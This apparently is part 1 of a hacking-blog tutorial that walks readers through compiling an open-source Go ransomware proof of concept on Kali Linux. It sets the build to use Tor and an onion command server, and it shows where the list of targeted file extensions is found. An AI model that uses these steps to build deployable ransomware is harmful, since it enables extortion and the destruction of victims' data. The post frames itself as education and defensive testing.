By otw

Ransomware: Build Your Own Ransomware, Part 1

Welcome back, my aspiring cyberwarriors!

Ransomware is rapidly becoming the most important form of malware afflicting our digital systems. Companies across the globe are being hit with various forms of malware, including the new variant, Snake, designed specifically for SCADA/ICS systems. The Colonial Pipeline in the US was shut down for nearly a week before paying a $5 million ransom, demonstrating the danger of this ransomware to industrial systems and a nation's infrastructure. Recently, the major US insurance company CNA admitted to having paid a ransom of $40 million! No wonder ransomware developers are getting more and more creative and malicious: ransomware pays!

To better understand how ransomware works, let's build our own ransomware from a Proof of Concept (POC) available from mauri870 on He developed this ransomware as part of his academic program and it is not designed for malicious purposes but rather to help us understand how ransomware works. Like the new variant, Snake, and a growing number of malware strains, this malware is written in Golang.

This malware encrypts the files in the background with AES-256-CTR and uses RSA-4096 to secure the data exchange with the server. This ransomware is very similar to Cryptolocker, one of the most successful ransomware attacks in history.

Step #1: Download and Install the Binaries

The first step is to fire up your Kali and make certain that golang is installed. If not, download it from the Kali repositories by entering:

kali > sudo apt install golang

Next, you will need to log in as the root user.

kali > sudo su -

Now create a directory for the binaries. In this case, I named it simply "git".

kali > mkdir git

Next, change directory (cd) to this directory.

kali > cd git

Next, download the binaries from

kali > git clone

Step #2: Export GO Environment variables

Next, we need to set some environment variables to direct the binaries and GO to the appropriate directories.

Step #3: Make the source code dependencies

Now, with the variables set and exported, we need to make the dependencies. Navigate to the new directory, ransomware, and enter make deps.

kali > cd ransomware

kali > make deps

Step #4: Make the Source Code with options

Now that we have completed the deps make, we can begin to make the source code. In our case, we will use a few options.

First, we want to use Tor so that our communications are encrypted over the Tor network.

Second, we want to use our dark web server at hackersarisegtdj.onion (you can use any domain or localhost).

Third, we want to use port 80 (you can use any port).

Finally, we want to set the operating system to compile the source code for our operating system, in this case, Linux.

Our command should look something like this:

kali > make -e USE_TOR=true SERVER_HOST=hackersarisegtdj.onion SERVER_PORT=80 GOOS=linux

Now hit ENTER and watch your ransomware compile.

Step #5: Check the Directory for ransomware.exe

Once the source code has been compiled, do a long listing of the ransomware directory.

kali > ls -l

Now, navigate to the bin directory.

kali > cd bin

Here, you will see ransomware.exe, the server, and unlocker.exe.

Step #6: Examine the Types of Files to be Encrypted

If you want to see what types of files this ransomware will encrypt, navigate to the cmd directory and open common.go.

kali > cd cmd

kali > more common.go

Here, you can see the file extensions that this ransomware will target to encrypt when executed.


Ransomware is probably the greatest threat to our digital systems at this moment. As the Colonial Pipeline attack clearly demonstrated, nearly everyone is vulnerable, and if SCADA/ICS systems are compromised, there can be significant economic and infrastructure ramifications!

This POC of ransomware will help you to better understand ransomware as a threat and test to see whether your systems are vulnerable to such an attack.

In the second part of this series, we will test this ransomware on a Windows VM.

If you or your team want to learn more about ransomware, our Ransomware training videos are available in our online store.
